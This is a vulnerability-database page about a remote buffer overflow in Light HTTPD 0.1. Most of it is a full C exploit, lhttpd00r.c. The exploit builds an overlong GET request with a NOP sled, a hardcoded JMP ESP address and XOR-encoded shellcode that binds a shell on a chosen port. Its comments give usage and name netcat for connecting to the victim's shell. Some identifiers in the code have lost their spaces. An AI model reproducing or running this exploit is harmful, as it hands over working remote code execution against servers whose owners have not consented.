Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Light HTTPD 0.1 GET Request Buffer Overflow Vulnerability (2)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 12 Views

HTTPD 0.1 Buffer Overflow Vulnerabilit

Code

                                                source: http://www.securityfocus.com/bid/6162/info
 
Light httpd is prone to a remotely exploitable buffer overflow condition. This overflow can be triggered by sending the server an excessively long GET request. As Light httpd drops user privileges when running, exploitation of this issue may result in the execution of arbitrary attacker-supplied commands with the privileges of the 'nobody' user. 

/*
 * lhttpd00r.c by uid0x00([email protected])
 *LHTTPd 0.1 remote buffer overflow exploit
 *
 *should work on any win32. just change ret[] to point at a valid "JMP ESP" address.
 *
 *compile with gcc lhttpd00r.c -o lhttpd00r
 *(tested on cygwin (win2k sp3), compiled with gcc 2.95.3-4 and on redhat 7.2 with gcc 2.96)
 *
 *binds a shell to a desired port.
 *usage: ./lhttpd00r <victimip> <shellport>
 *connect with netcat: nc -v <victimip> <port>
 *
 *Disclaimer:
 *Use of this information constitutes acceptance for use in an AS IS condition. There are
 *NO warranties with regard to this information. In no event shall the author
 *be liable for any damages whatsoever arising out of or in connection with
 *the use or spread of this information. Any use of this information is at the
 *user's own risk.
 *
 */
#ifdef _WIN32
#include <windows.h>
#include <winsock2.h>
#else
#include <sys/socket.h>
#include <sys/errno.h>
#include <netinet/in.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#define PORT 3000
#define SHELLCODE_SIZE0x00000300// 768
void usage(char *argv[])
{
    printf("usage:\t%s <ip> <port>\n", argv[0]);
    exit(0);
}
int main(int argc, char *argv[])
{
intport=PORT;
ints;
structsockaddr_in SockAdr;
charret[] = "\xA7\x88\xE2\x77"; //JMP ESP in USER32.DLL Vers. 5.0.2195.4314
charsendnrecv[4096];
char buf[2500];
unsigned shortaport, key;
unsigned charshellcode[SHELLCODE_SIZE] =
{
0xEB, 0x03, 0x5E, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x56, 0x8D,
0x76, 0x17, 0x8B, 0xFE, 0x8B, 0xD6, 0xB9, 0x20, 0xFD, 0xFF, 0xFF, 0xF7,
0xD1, 0xB4, 0x63, 0xAC, 0x32, 0xC4, 0xAA, 0xE2, 0xFA, 0x07, 0x04, 0xC2,
0x53, 0x63, 0xE6, 0xA3, 0x1B, 0x6F, 0xE8, 0x13, 0x6F, 0xE8, 0x15, 0x7F,
0xCE, 0xE8, 0x3B, 0x6B, 0x88, 0x6A, 0xE8, 0x23, 0x57, 0xE8, 0xFB, 0xDB,
0x63, 0x63, 0x63, 0x3D, 0x35, 0xEE, 0xDD, 0x95, 0x61, 0x63, 0x63, 0x35,
0xEE, 0x14, 0xDB, 0xEE, 0x35, 0xDE, 0x09, 0x64, 0x3A, 0xCE, 0x9C, 0xB1,
0xC8, 0x81, 0x99, 0xDB, 0x01, 0x04, 0xEE, 0xC7, 0x9C, 0xB1, 0x31, 0x8B,
0x64, 0x63, 0x63, 0x63, 0x14, 0x10, 0x51, 0x3C, 0x50, 0x51, 0x63, 0x9C,
0xB3, 0x39, 0xF0, 0x09, 0x68, 0x3A, 0xCE, 0x9C, 0xB1, 0xC8, 0x81, 0x99,
0x3D, 0xAB, 0x53, 0x61, 0x63, 0x8B, 0x65, 0x63, 0x63, 0x63, 0xE8, 0x07,
0x47, 0x6B, 0x88, 0x15, 0x50, 0xB1, 0x07, 0x9C, 0x51, 0x07, 0xEA, 0x41,
0x35, 0xEE, 0xDE, 0xB3, 0x9E, 0x9C, 0x9C, 0xEE, 0x2C, 0x4F, 0x48, 0xAC,
0xF1, 0x9F, 0x90, 0xC9, 0xF0, 0xEE, 0x24, 0x93, 0xEE, 0x2B, 0x67, 0xEE,
0x1B, 0x77, 0x8B, 0xD3, 0x62, 0x63, 0x63, 0xEE, 0x24, 0x87, 0xEE, 0x2C,
0x8B, 0x8B, 0xC6, 0x62, 0x63, 0x63, 0x80, 0x22, 0xEE, 0xD5, 0x71, 0x60,
0x63, 0x63, 0xEA, 0x14, 0x9F, 0x09, 0x65, 0x09, 0x62, 0x09, 0x61, 0xCE,
0x9C, 0xB3, 0xEA, 0x24, 0x97, 0x23, 0x17, 0x4A, 0x2B, 0x09, 0x62, 0xE8,
0xAF, 0x09, 0x67, 0x32, 0x09, 0x67, 0x0B, 0x9C, 0x9C, 0x63, 0x63, 0x33,
0xCE, 0x9C, 0xB3, 0x3A, 0xE6, 0xA3, 0x16, 0x72, 0x0B, 0x63, 0x61, 0x63,
0x63, 0x34, 0xCE, 0x9C, 0xB3, 0x34, 0xCE, 0x9C, 0xB3, 0xE6, 0xA3, 0x16,
0x65, 0x3D, 0x8A, 0xD1, 0x63, 0x63, 0x63, 0xE8, 0x23, 0x6F, 0xE8, 0x63,
0x34, 0xE8, 0x1C, 0x97, 0x30, 0x30, 0x9C, 0x53, 0x0B, 0x61, 0x63, 0x6E,
0x66, 0xE8, 0xAF, 0x09, 0x73, 0x32, 0x34, 0xCE, 0x9C, 0xB3, 0xE0, 0xA7,
0x73, 0x09, 0x62, 0x34, 0xCE, 0x9C, 0xB3, 0x30, 0x30, 0x34, 0xCE, 0x9C,
0xB3, 0x3C, 0xEA, 0x24, 0x9B, 0x23, 0x17, 0xAA, 0x3D, 0x9C, 0x14, 0x87,
0x9C, 0x57, 0x47, 0x9C, 0x14, 0x93, 0x30, 0x30, 0x0B, 0x62, 0x62, 0x63,
0x63, 0x09, 0x69, 0x3A, 0x30, 0x81, 0x9E, 0x09, 0x27, 0xE8, 0xB7, 0xEF,
0xAA, 0x51, 0xAA, 0x80, 0x72, 0x0B, 0x20, 0x2C, 0x2E, 0x63, 0x0B, 0x22,
0x2D, 0x27, 0x4D, 0x0B, 0x20, 0x2C, 0x2E, 0x2E, 0x88, 0x66, 0x0B, 0x20,
0x2E, 0x27, 0x63, 0xE8, 0xAF, 0xEE, 0x24, 0xB7, 0x33, 0x31, 0x30, 0x30,
0x09, 0x73, 0x09, 0x62, 0x30, 0x30, 0x32, 0x30, 0x9C, 0xF5, 0x95, 0x61,
0x63, 0x63, 0xE0, 0xA7, 0x2B, 0xF2, 0x80, 0x4E, 0x35, 0x30, 0x37, 0x9C,
0x14, 0xB7, 0xEE, 0xD5, 0x99, 0x61, 0x63, 0x63, 0xCE, 0x9C, 0xB3, 0xF2,
0x80, 0x79, 0x3B, 0x05, 0x5E, 0x60, 0x62, 0x16, 0x70, 0x30, 0xE8, 0xAF,
0x30, 0x32, 0x30, 0x30, 0x30, 0x9C, 0x14, 0x8B, 0xCE, 0x9C, 0xB3, 0x3A,
0xE6, 0xA3, 0x16, 0x60, 0x3D, 0x88, 0x11, 0x80, 0x4E, 0xDB, 0x63, 0x61,
0x63, 0x63, 0x58, 0xAB, 0x15, 0x62, 0xF2, 0x30, 0xE8, 0xB7, 0x30, 0x31,
0x32, 0x34, 0x9C, 0x14, 0x8B, 0xCE, 0x9C, 0xB3, 0xF2, 0x3B, 0x80, 0x83,
0x3D, 0x30, 0x33, 0x34, 0x9C, 0x14, 0x9B, 0x9C, 0xF5, 0x4D, 0x60, 0x63,
0x63, 0x23, 0x17, 0xB2, 0x88, 0xC1, 0x3D, 0x9C, 0x14, 0x9B, 0x09, 0x62,
0xE8, 0xA7, 0x30, 0x09, 0x51, 0xE8, 0xAF, 0x32, 0x30, 0x30, 0x33, 0x30,
0x9C, 0xF5, 0x51, 0x60, 0x63, 0x63, 0x23, 0x17, 0x4B, 0x2B, 0x17, 0x83,
0x30, 0x0B, 0x63, 0x61, 0x63, 0x63, 0x34, 0x9C, 0x14, 0x9B, 0x9C, 0xF5,
0x55, 0x60, 0x63, 0x63, 0x23, 0x17, 0x71, 0x2B, 0x30, 0x37, 0x33, 0x34,
0x9C, 0x14, 0x8F, 0x9C, 0xF5, 0x65, 0x60, 0x63, 0x63, 0xE6, 0xA3, 0x16,
0xD8, 0x50, 0xB1, 0x07, 0xEC, 0x61, 0x39, 0xEE, 0xD5, 0x69, 0x60, 0x63,
0x63, 0xE8, 0x7D, 0xE8, 0x1D, 0x53, 0xEE, 0xD6, 0xB7, 0x9E, 0x9C, 0x9C,
0xCE, 0x33, 0xCE, 0x33, 0xCE, 0xCE, 0x09, 0x65, 0x3A, 0xCE, 0x33, 0x81,
0x9F, 0x9C, 0xB4, 0x9C, 0xB4, 0x09, 0x65, 0x3D, 0x9C, 0xB0, 0x2D, 0x16,
0x98, 0xAA, 0x8A, 0xA1, 0x9E, 0x9C, 0x9C, 0x09, 0x62, 0x30, 0x09, 0x6F,
0xE8, 0xB7, 0x30, 0x31, 0x33, 0x32, 0x9C, 0xF5, 0x6D, 0x60, 0x63, 0x63,
0xE0, 0xA7, 0x6F, 0xF2, 0xA0, 0x03, 0xF4, 0xE8, 0x28, 0x5F, 0xE8, 0x2F,
0x7A, 0x1B, 0x60, 0xA8, 0x50, 0x95, 0xEE, 0x77, 0xD0, 0x60, 0x32, 0x43,
0xE8, 0x71, 0x60, 0xB0, 0x50, 0xA3, 0xA2, 0xA3, 0x64, 0x51, 0x61, 0x21,
0xE3, 0x59, 0x63, 0x16, 0x96, 0x25, 0x58, 0xA4, 0x16, 0x87, 0x2D, 0xE8,
0x32, 0x47, 0x60, 0xB0, 0x6C, 0xD4, 0x77, 0x11, 0xE8, 0x22, 0x7F, 0x60,
0xA0, 0xE8, 0x67, 0xF3, 0x60, 0xA0, 0xEA, 0x27, 0x47, 0x7F, 0x02, 0xA0,
0xA4, 0xE9, 0x52, 0x25, 0xE6, 0x20, 0xAA, 0x9E, 0x5D, 0x15, 0xB6, 0xE2,
0x08, 0x82, 0x1C, 0x2B, 0xA0, 0xB2, 0x5C, 0x6C, 0xB6, 0xD3, 0x5D, 0x11,
0x81, 0x9C, 0xB2, 0xCB, 0x09, 0x92, 0x19, 0x9F, 0x50, 0x54, 0xF1, 0xBB,
0xEB, 0xB3, 0x6A, 0xDA, 0xA5, 0x7B, 0x20, 0x97, 0x07, 0x14, 0x39, 0x6F,
0xEB, 0x52, 0x1E, 0xFD, 0x19, 0x18, 0x1A, 0x5F, 0x07, 0x14, 0x1A, 0x6D,
0x09, 0x11, 0xFA, 0x3E, 0x95, 0x12, 0x3A, 0x6D, 0xFF, 0x1E, 0xFE, 0xF0
};
printf("\nLHTTPd 0.1 remote exploit by uid0x00 ([email protected])\n\n");
//check arguments
if(argc != 3)
{
usage(argv);
}
if ( (atoi(argv[2]) > 65535) || (atoi(argv[2]) <= 0) ) usage(argv);
//set port
aport = (short)atoi(argv[2]);
shellcode[276] = (aport) & 0xff;
    shellcode[275] = (aport >> 8) & 0xff;
//xor
key = (char)99;
shellcode[275]^=key;
shellcode[276]^=key;
//set buffer
memset(buf, 0x90, sizeof(buf));
memcpy(buf+260, ret, 4);//return adress
//memset(buf+265, 0xCC, 1);//break point
//there's some kind of garbage on the stack right after the ret so the shellcode starts at 10000
memcpy(buf+1000, shellcode, sizeof(shellcode));
snprintf(sendnrecv, sizeof(sendnrecv), "GET /%s HTTP/1.0\r\n\n", buf);
printf("initialising socket\n");
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
if (s)
{
    printf("...initialized\n");
    memset(&SockAdr, 0, sizeof(SockAdr));
    SockAdr.sin_addr.s_addr = inet_addr(argv[1]);
    SockAdr.sin_family = AF_INET;
    SockAdr.sin_port = htons(PORT);
printf("trying to connect\n");
if (!connect(s, (struct sockaddr *)&SockAdr, sizeof(SockAdr)))
{
printf("...connected\n");
      printf("(waiting)\n");
      sleep(3);
printf("sending exploit\n");
      send(s, sendnrecv, strlen(sendnrecv), 0);
printf("...sent\n");
printf("(waiting)\n");
sleep(3);
printf("...closed\nshell bound to port %s \n", argv[2]);
close(s);
    }
    else
    {
printf("... failed :( errno = %i\n", errno);
close(s);
return(0);
    }
}
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
light httpdremote exploitationbuffer overflowarbitrary commandsuser privilegesremote exploitsecurity vulnerability
12